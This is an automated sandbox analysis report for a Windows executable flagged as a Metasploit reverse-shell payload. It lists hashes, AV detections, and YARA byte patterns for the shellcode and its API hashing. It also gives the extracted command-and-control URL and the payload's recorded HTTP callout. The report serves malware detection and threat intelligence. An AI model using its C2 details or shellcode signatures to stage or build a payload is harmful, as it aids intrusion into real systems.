Edit tour

Windows Analysis Report
443_2003_https-df.exe

Overview

General Information

Sample name:443_2003_https-df.exe
Analysis ID:1636969
MD5:8d9c0f42baf129d1b430a01463dd7870
SHA1:4054be8879b458c034340b19311baa42218c216d
SHA256:b3ffbb213580aac6f9dc8d7ea321bd61be3e5cd41647e29aabeaedee2bfc4b83
Tags:exemalwareRozenauser-Joker
Infos:

Detection

Metasploit
Score:96
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Metasploit Payload
C2 URLs / IPs found in malware configuration
Joe Sandbox ML detected suspicious sample
AV process strings found (often used to terminate AV products)
Entry point lies outside standard sections
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • 443_2003_https-df.exe (PID: 7004 cmdline: "C:\Users\user\Desktop\443_2003_https-df.exe" MD5: 8D9C0F42BAF129D1B430A01463DD7870)
    • WerFault.exe (PID: 6160 cmdline: C:\Windows\system32\WerFault.exe -u -p 7004 -s 1076 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
{
  "Type": "Metasploit Connect",
  "URL": "http://good.com:443/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S"
}
SourceRuleDescriptionAuthorStrings
443_2003_https-df.exeJoeSecurity_MetasploitPayload_2Yara detected Metasploit PayloadJoe Security
    443_2003_https-df.exeJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
      443_2003_https-df.exeWindows_Trojan_Metasploit_0f5a852dIdentifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families.unknown
      • 0x18db:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
      443_2003_https-df.exeWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
      • 0x1881:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
      SourceRuleDescriptionAuthorStrings
      00000001.00000002.1865850778.0000000140004000.00000080.00000001.01000000.00000003.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
        00000001.00000002.1865850778.0000000140004000.00000080.00000001.01000000.00000003.sdmpWindows_Trojan_Metasploit_0f5a852dIdentifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families.unknown
        • 0xdb:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
        00000001.00000002.1865850778.0000000140004000.00000080.00000001.01000000.00000003.sdmpWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
        • 0x81:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
        00000001.00000000.1458091654.0000000140004000.00000080.00000001.01000000.00000003.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
          00000001.00000000.1458091654.0000000140004000.00000080.00000001.01000000.00000003.sdmpWindows_Trojan_Metasploit_0f5a852dIdentifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families.unknown
          • 0xdb:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
          Click to see the 1 entries
          SourceRuleDescriptionAuthorStrings
          1.0.443_2003_https-df.exe.140000000.0.unpackJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
            1.2.443_2003_https-df.exe.140000000.0.unpackJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
              1.0.443_2003_https-df.exe.140000000.0.unpackWindows_Trojan_Metasploit_0f5a852dIdentifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families.unknown
              • 0x1723:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
              1.0.443_2003_https-df.exe.140000000.0.unpackWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
              • 0x16c9:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
              1.2.443_2003_https-df.exe.140000000.0.unpackWindows_Trojan_Metasploit_0f5a852dIdentifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families.unknown
              • 0x1723:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
              Click to see the 1 entries
              No Sigma rule has matched
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 443_2003_https-df.exeAvira: detected
              Source: 443_2003_https-df.exeMalware Configuration Extractor: Metasploit {"Type": "Metasploit Connect", "URL": "http://good.com:443/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S"}
              Source: 443_2003_https-df.exeVirustotal: Detection: 78%Perma Link
              Source: 443_2003_https-df.exeReversingLabs: Detection: 84%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: unknownHTTPS traffic detected: 74.82.70.131:443 -> 192.168.2.6:49683 version: TLS 1.2

              Networking

              barindex
              Source: Malware configuration extractorURLs: http://good.com:443/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S HTTP/1.1Host: cdn123.offseccdn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Cache-Control: no-cache
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\443_2003_https-df.exeCode function: 1_2_00000001400042B6 VirtualAlloc,InternetReadFile,1_2_00000001400042B6
              Source: global trafficHTTP traffic detected: GET /8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S HTTP/1.1Host: cdn123.offseccdn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Cache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: good.com
              Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
              Source: 443_2003_https-df.exe, 00000001.00000002.1865209545.000000000048B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://good.com/-
              Source: 443_2003_https-df.exe, 00000001.00000002.1865209545.000000000048B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://good.com/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7
              Source: 443_2003_https-df.exe, 00000001.00000002.1865209545.000000000048B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://good.com/L
              Source: 443_2003_https-df.exe, 00000001.00000002.1865209545.000000000048B000.00000004.00000020.00020000.00000000.sdmp, 443_2003_https-df.exe, 00000001.00000002.1865381329.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, 443_2003_https-df.exe, 00000001.00000003.1488458239.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, 443_2003_https-df.exe, 00000001.00000003.1488542177.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, 443_2003_https-df.exe, 00000001.00000002.1865696292.0000000002B90000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.blackberry.com
              Source: 443_2003_https-df.exe, 00000001.00000002.1865209545.000000000048B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.blackberry.com2rI
              Source: 443_2003_https-df.exe, 00000001.00000002.1865209545.000000000048B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.blackberry.com2rI_qI
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
              Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
              Source: unknownHTTPS traffic detected: 74.82.70.131:443 -> 192.168.2.6:49683 version: TLS 1.2

              System Summary

              barindex
              Source: 443_2003_https-df.exe, type: SAMPLEMatched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
              Source: 443_2003_https-df.exe, type: SAMPLEMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
              Source: 1.0.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
              Source: 1.0.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
              Source: 1.2.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
              Source: 1.2.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
              Source: 00000001.00000002.1865850778.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
              Source: 00000001.00000002.1865850778.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
              Source: 00000001.00000000.1458091654.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
              Source: 00000001.00000000.1458091654.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
              Source: C:\Users\user\Desktop\443_2003_https-df.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7004 -s 1076
              Source: 443_2003_https-df.exe, type: SAMPLEMatched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
              Source: 443_2003_https-df.exe, type: SAMPLEMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
              Source: 1.0.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
              Source: 1.0.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
              Source: 1.2.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
              Source: 1.2.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
              Source: 00000001.00000002.1865850778.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
              Source: 00000001.00000002.1865850778.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
              Source: 00000001.00000000.1458091654.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
              Source: 00000001.00000000.1458091654.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
              Source: classification engineClassification label: mal96.troj.winEXE@2/6@1/1
              Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7004
              Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\36652870-3caf-4f7e-98bc-f2e9f71eaacaJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 443_2003_https-df.exeVirustotal: Detection: 78%
              Source: 443_2003_https-df.exeReversingLabs: Detection: 84%
              Source: unknownProcess created: C:\Users\user\Desktop\443_2003_https-df.exe "C:\Users\user\Desktop\443_2003_https-df.exe"
              Source: C:\Users\user\Desktop\443_2003_https-df.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7004 -s 1076
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: 443_2003_https-df.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: initial sampleStatic PE information: section where entry point is pointing to: .jcho
              Source: 443_2003_https-df.exeStatic PE information: real checksum: 0xfa97 should be: 0xfc4f
              Source: 443_2003_https-df.exeStatic PE information: section name: .jcho
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: Amcache.hve.4.drBinary or memory string: VMware
              Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
              Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
              Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
              Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.4.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
              Source: 443_2003_https-df.exe, 00000001.00000002.1865209545.000000000048B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: 443_2003_https-df.exe, 00000001.00000002.1865209545.000000000045A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.4.drBinary or memory string: vmci.sys
              Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
              Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
              Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.4.drBinary or memory string: VMware20,1
              Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
